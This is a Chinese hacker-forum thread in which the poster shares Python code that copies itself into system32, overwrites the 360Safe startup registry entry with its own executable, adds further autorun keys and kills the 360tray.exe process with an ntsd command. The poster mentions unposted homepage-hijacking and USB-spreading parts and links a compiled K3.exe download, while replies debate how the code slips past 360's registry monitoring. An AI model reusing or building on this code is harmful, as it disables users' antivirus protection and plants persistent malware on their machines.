[原创]用python修改注册表干掉360safe
文章作者:吴杰信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
[language=python]import _winreg
import os
import shutil
#复制自身
shutil.copyfile('K3.exe','c:\WINDOWS\system32\K3.exe')
#把360启动改为自身
run = _winreg.OpenKey(
_winreg.HKEY_LOCAL_MACHINE,
"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0,_winreg.KEY_WRITE
)
_winreg.SetValueEx(
run,"360Safetray",0,_winreg.REG_SZ,
r"C:\WINDOWS\system32\k3.exe"
)
#添加自启动
self = _winreg.OpenKey(
_winreg.HKEY_LOCAL_MACHINE,
"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0,_winreg.KEY_WRITE
)
_winreg.SetValueEx(
run,"k3",0,_winreg.REG_SZ,
r"C:\WINDOWS\system32\k3.exe"
)
#添加所有用户启动
allrun = _winreg.OpenKey(
_winreg.HKEY_LOCAL_MACHINE,
"Microsoft\Windows\CurrentVersion\policies\Explorer\Run",0,_winreg.KEY_WRITE
)
_winreg.SetValueEx(
allrun,"k3",0,_winreg.REG_SZ,
r"C:\WINDOWS\system32\k3.exe"
)
#终止360进程
os.popen("ntsd -c q -pn 360tray.exe cmd")[/language] ntsd -c q -pn 360tray.exe cmd
很好,很强大.
弱弱问下,LZ用的什么语言啊?
俺怎么从来木有见过捏.
----------------------------------
原来是python语言... 从来木听说过.[s:267] 我只是把杀360的部分程序拿出来了,还一部份是修改首页和U盘传播的部分,有空发来
终止360进程那个部分,在程序中试了很多命令都不能结束它,最后google 找到了这个。 汗,360又不是恶意软件,它没有保护自己进程呀.随便怎么样都可以结束掉的啊.
R3的TerminateProcess就可以结束掉了.别说通过job、PspTerminateThreadByPointer等了。。。
----------------------------------------------------------------------------------------------------------------------------------
[b]修改首页[/b]
不知道有多邪恶呢, 如同cnnic反复更改注册表,FSD INLINE HOOK之类的呀?
[b]U盘传播[/b]
呵呵,U盘小偷之类的程序很多,R3 或者R0下都可以实现.R3下方便点儿
[s:265] 从头到尾,还是debug attach再XX,不够邪恶... 我从来没有用过360所以有一个问题想问一下:难道360没有Hook NtSetValueKey ? [quote]引用第5楼delphiscn于2008-01-27 16:51发表的 :
我从来没有用过360所以有一个问题想问一下:难道360没有Hook NtSetValueKey ?[/quote]
做注册表监控的,一般都会HOOK 掉NtSetValueKey ,但一般只对关键的地方进行判断处理,其他无视的地方直接放行.[s:274]
俺机器上有微点,所以被它HOOK了,看不到360驱动的痕迹.
--------------------------------------------------------------------------------
综上,LZ的这些科普代码一点作用都没有 (LZ不要生气啊,俺实事求是的说) -->
#[b]把360启动改为自身[/b]
run = _winreg.OpenKey(
_winreg.HKEY_LOCAL_MACHINE,
"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0,_winreg.KEY_WRITE
)
_winreg.SetValueEx(
run,"360Safetray",0,_winreg.REG_SZ,
r"C:\WINDOWS\system32\k3.exe"
)
这能成功俺一个月不碰内核了! 回楼上的,你准备一个月不碰内核吧,我可以打包成EXE让你试下,如果没成功我怎敢到这里来胡说八道 我就不用试了.这点不能称为技术的东西N年前就搞过了. 开着360的监控能这样过那就太牛B了...
小大小闹犯不着拿到俺这个菜鸟面前炫耀..., 在内核群帖了这个帖子.反映不错
没有鄙夷你的意思.只是觉得这样称不上技术的技术发出来闹闹还行,没想你还认真了.
看俺最后能不能一个月内不碰内核. [url]http://www.wujie.name/K3.exe[/url]
这个是下载地址
开着360监控执行即可
虽然我知道这个方法称不上“技术”,但是我的目标就是结束360的进程和不让它自动启动,至于用多高深的办法我不管,请你们不要鄙视我这个菜鸟,谢谢。 原来你是钻了360注册表监控的空子, 360 好像只对新增的关键位置的启动项作出拦截.对修改已有项不会有反映..
理解的方向不同呀. 早些时候xyreg牛用的HIVE的方法过注册表监控测试是新增项,而不是修改已有项....
没有人会鄙视你,也没有资格鄙视任何人。就事论事.和谐社会,和谐论坛.共同讨论,共同提高 [s:225] LS的不做试验不仔细看就说一个月不碰内核,这下囧了吧.说话考虑下别人的感受再说吧...
还有那个群里的那位,骂别人SB的时候不知道自己是不是仔细看过帖子.
我看帖子标题清晰,内容明确,虽然这帖子都算不上技术帖,可是毕竟是360的一个小bug,是LZ研究的结果,值得尊重. 乱评价的人拿出自己的代码来不就得了。光张个嘴巴乱指点别人没说服力
页:
[1]